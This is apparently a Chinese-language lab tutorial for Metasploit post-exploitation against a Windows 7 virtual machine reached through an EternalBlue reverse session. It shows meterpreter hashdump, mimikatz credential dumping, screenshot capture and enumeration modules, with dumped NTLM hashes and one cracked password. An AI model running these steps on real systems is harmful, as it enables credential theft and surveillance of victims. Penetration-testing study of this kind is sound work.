224.0.0.252 01:00:5e:00:00:fc 15
224.0.0.252 01:00:5e:00:00:fc 14
239.255.255.250 00:00:00:00:00:00 1
239.255.255.250 01:00:5e:7f:ff:fa 9
239.255.255.250 01:00:5e:7f:ff:fa 15
239.255.255.250 01:00:5e:7f:ff:fa 14
255.255.255.255 ff:ff:ff:ff:ff:ff 15
255.255.255.255 ff:ff:ff:ff:ff:ff 14
meterpreter > screenshot
Screenshot saved to: /root/Desktop/mxgikKyO.jpeg
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9fa36dc4327eacd782cc622a158a301b:::加载模块
kiwi/mimikatz
kiwi命令
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
获取Windows凭证
meterpreter > load kiwi
meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN7X64-PRO (null)
win7x64-pro$ sam.zoqa.com <u%cRB#Tg6B7e>^m&;CDRz'=w\;s7>u+:+b3ecQhKR>e9JHkL*aJQrA<-X7zJ8fW/6%l i5G!Lq8kSB.OLN*b87DrLfqHmFaEn4U;LX`@)`vqYs/Lr/Ldi7#
win7x64-pro$ SAM.ZOQA.COM <u%cRB#Tg6B7e>^m&;CDRz'=w\;s7>u+:+b3ecQhKR>e9JHkL*aJQrA<-X7zJ8fW/6%l i5G!Lq8kSB.OLN*b87DrLfqHmFaEn4U;LX`@)`vqYs/Lr/Ldi7#
post模块后渗透
反弹shell后使用background命令将会话置于后台运行。然后使用其他post脚本进行后渗透。
回到会话使用sessions id。
检测是否是虚拟机post(windows/gather/checkvm)
需要先反弹shell回来建立了session会话。
msf6 post(windows/gather/checkvm) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X 192.168.2.200:4444 -> 192.16
64-PRO 8.2.242:49163 (192.168.2.24
2)
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/checkvm
msf6 post(windows/gather/checkvm) > show options
Module options (post/windows/gather/checkvm):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
msf6 post(windows/gather/checkvm) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X 192.168.2.200:4444 -> 192.16
64-PRO 8.2.242:49163 (192.168.2.24
2)
msf6 post(windows/gather/checkvm) > set session 1
session => 1
msf6 post(windows/gather/checkvm) > run
[*] Checking if the target is a Virtual Machine ...
[+] This is a VMware Virtual Machine
[*] Post module execution completed
枚举应用程序 post/windows/gather/enum_applications
msf6 post(windows/gather/enum_applications) > show options
Module options (post/windows/gather/enum_applications):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
msf6 post(windows/gather/enum_applications) > setg session 1
session => 1
msf6 post(windows/gather/enum_applications) > run
[*] Enumerating applications installed on WIN7X64-PRO
Installed Applications
======================
Name Version
---- -------
7-Zip 22.00 (x64) 22.00
Google Chrome 103.0.5060.114
Microsoft .NET Framework 4 Client Profile 4.0.30319
Microsoft .NET Framework 4 Client Profile 4.0.30319
Microsoft .NET Framework 4 Extended 4.0.30319
Microsoft .NET Framework 4 Extended 4.0.30319
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 14.28.29913.0
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29913 14.28.29913.0
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29913 14.28.29913
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29913 14.28.29913
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29913 14.28.29913
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29913 14.28.29913
[+] Results stored in: /root/.msf4/loot/20220714033151_default_192.168.2.242_host.application_581375.txt
枚举登录用户post(windows/gather/enum_logged_on_users)
msf6 post(windows/gather/enum_logged_on_users) > show options
Module options (post/windows/gather/enum_logged_on_users):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently logged on users
RECENT true yes Enumerate Recently logged on users
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/enum_logged_on_users) > run
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-18 NT AUTHORITY\SYSTEM
S-1-5-21-1012354990-2264756431-1354823717-500 WIN7X64-PRO\Administrator
[+] Results saved in: /root/.msf4/loot/20220714033540_default_192.168.2.242_host.users.activ_416725.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-1012354990-2264756431-1354823717-500 C:\Users\Administrator
S-1-5-21-3545534923-732207918-319454455-1110 C:\Users\win7
S-1-5-21-3545534923-732207918-319454455-500 C:\Users\administrator.SAM
[*] Post module execution completed
枚举补丁post(windows/gather/enum_patches)
msf6 post(windows/gather/enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/enum_patches) > run
[*] Patch list saved to /root/.msf4/loot/20220714034241_default_192.168.2.242_enum_patches_980994.txt
[+] KB2534111 installed on 7/8/2022
[+] KB2999226 installed on 7/8/2022
[+] KB958488 installed on 7/8/2022
[+] KB976902 installed on 11/21/2010
[*] Post module execution completed
获取powershell环境
msf6 post(windows/gather/enum_powershell_env) > show options
Module options (post/windows/gather/enum_powershell_env):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/enum_powershell_env) > run
[*] Running module against WIN7X64-PRO
[*] Powershell is Installed on this system.
[*] Version: 2.0
[*] Execution Policy:
[*] Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] No PowerShell Snap-Ins are installed
[*] Powershell Modules:
[*] AppLocker
[*] BitsTransfer
[*] PSDiagnostics
[*] TroubleshootingPack
[*] Checking if users have Powershell profiles
[*] Checking Administrator
[*] Post module execution completed
枚举服务post(windows/gather/enum_services)
msf6 post(windows/gather/enum_services) > show options
Module options (post/windows/gather/enum_services):
Name Current Setting Required Description
---- --------------- -------- -----------
CRED no String to search credentials for
PATH no String to search path for
SESSION 1 yes The session to run this module on
TYPE All yes Service startup Option (Accepted: All, Auto, Manual, Di
sabled)
msf6 post(windows/gather/enum_services) > run
[*] Listing Service Info for matching services, please wait...
[+] New service credential detected: AeLookupSvc is running as 'localSystem'
[+] New service credential detected: ALG is running as 'NT AUTHORITY\LocalService'
[+] New service credential detected: aspnet_state is running as 'NT AUTHORITY\NetworkService'
Services
========
Name Credentials Command Startup
---- ----------- ------- -------
ALG NT AUTHORITY\LocalServ Manual C:\Windows\System32\alg.exe
ice
AeLookupSvc localSystem Manual C:\Windows\system32\svchost.exe -k n
etsvcs
AppIDSvc NT Authority\LocalServ Manual C:\Windows\system32\svchost.exe -k L
ice ocalServiceAndNoImpersonation
AppMgmt LocalSystem Manual C:\Windows\system32\svchost.exe -k n
etsvcs
Appinfo LocalSystem Manual C:\Windows\system32\svchost.exe -k n
etsvcs
AudioEndpointBuilder LocalSystem Auto C:\Windows\System32\svchost.exe -k L
ocalSystemNetworkRestricted
AudioSrv NT AUTHORITY\LocalServ Auto C:\Windows\System32\svchost.exe -k L
ice ocalServiceNetworkRestricted
AxInstSV LocalSystem Manual C:\Windows\system32\svchost.exe -k A
xInstSVGroup
BDESVC localSystem Manual C:\Windows\System32\svchost.exe -k n
etsvcs
BFE NT AUTHORITY\LocalServ Auto C:\Windows\system32\svchost.exe -k L
ice ocalServiceNoNetwork
BITS LocalSystem Auto C:\Windows\System32\svchost.exe -k n
etsvcs
...
wscsvc NT AUTHORITY\LocalServ Auto C:\Windows\System32\svchost.exe -k L
ice ocalServiceNetworkRestricted
wuauserv LocalSystem Auto C:\Windows\system32\svchost.exe -k n
etsvcs
wudfsvc LocalSystem Manual C:\Windows\system32\svchost.exe -k L
ocalSystemNetworkRestricted
[+] Loot file stored in: /root/.msf4/loot/20220714034555_default_192.168.2.242_windows.services_733410.txt
[*] Post module execution completed
密码哈希post(windows/gather/smart_hashdump)
msf6 post(windows/gather/smart_hashdump) > show options
Module options (post/windows/gather/smart_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
GETSYSTEM true no Attempt to get SYSTEM privilege on the target host.
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/smart_hashdump) > run
[*] Running module against WIN7X64-PRO
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220714034935_default_192.168.2.242_windows.hashes_728157.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 17616e5575ff1a73c1cd668d5964850a...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] admin1:1005:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::
[*] Post module execution completed
################################################
579da618cfbfa85247acf1f800a280a4 -> admin@123
##############################################程序转文件post(windows/gather/memory_dump)
msf6 post(windows/gather/memory_dump) > show options
Module options (post/windows/gather/memory_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_PATH yes File to write memory dump to
DUMP_TYPE standard yes Minidump size (Accepted: standard, full)
PID yes ID of the process to dump memory from
SESSION 1 yes The session to run this module on
屏幕截屏
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 1 yes The session to run this module on
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) > loot -t screensoy.screenshot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.2.242 screenspy.screenshot screenshot.0.jpg image/jpg Screenshot /root/.msf4/loot/20220714040811_default_192.168.2.242_screenspy.screen_870404.jpg
192.168.2.242 screenspy.screenshot screenshot.1.jpg image/jpg Screenshot /root/.msf4/loot/20220714040816_default_192.168.2.242_screenspy.screen_288220.jpg
192.168.2.242 screenspy.screenshot screenshot.2.jpg image/jpg Screenshot /root/.msf4/loot/20220714040821_default_192.168.2.242_screenspy.screen_821367.jpg
192.168.2.242 screenspy.screenshot screenshot.3.jpg image/jpg Screenshot /root/.msf4/loot/20220714040826_default_192.168.2.242_screenspy.screen_873405.jpg
192.168.2.242 screenspy.screenshot screenshot.4.jpg image/jpg Screenshot /root/.msf4/loot/20220714040831_default_192.168.2.242_screenspy.screen_295092.jpg
192.168.2.242 screenspy.screenshot screenshot.5.jpg image/jpg Screenshot /root/.msf4/loot/20220714040837_default_192.168.2.242_screenspy.screen_210541.jpg
网络连接post(windows/gather/tcpnetstat)
msf6 post(windows/gather/tcpnetstat) > show options
Module options (post/windows/gather/tcpnetstat):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on
msf6 post(windows/gather/tcpnetstat) > run
[*] TCP Table Size: 552
[*] Total TCP Entries: 17
[*] Connection Table
================
STATE LHOST LPORT RHOST RPORT
----- ----- ----- ----- -----
CLOSE_WAIT 192.168.2.242 49250 35.186.238.101 80
ESTABLISHED 192.168.2.242 49251 35.186.238.101 80
ESTABLISHED 192.168.2.242 49255 192.168.2.200 3333
ESTABLISHED 192.168.2.242 49260 120.253.253.98 443
ESTABLISHED 192.168.2.242 49261 35.186.238.101 80
LISTEN 0.0.0.0 135 0.0.0.0 _
LISTEN 0.0.0.0 445 0.0.0.0 _
LISTEN 0.0.0.0 49152 0.0.0.0 _
LISTEN 0.0.0.0 49153 0.0.0.0 _
LISTEN 0.0.0.0 49154 0.0.0.0 _
LISTEN 0.0.0.0 49155 0.0.0.0 _
LISTEN 0.0.0.0 49156 0.0.0.0 _
LISTEN 0.0.0.0 49159 0.0.0.0 _
LISTEN 192.168.2.242 139 0.0.0.0 _
SYN_SENT 192.168.2.242 49262 172.217.160.74 443
SYN_SENT 192.168.2.242 49263 172.217.160.74 443
TIME_WAIT 192.168.2.242 49252 35.186.238.101 80
[*] Post module execution completed
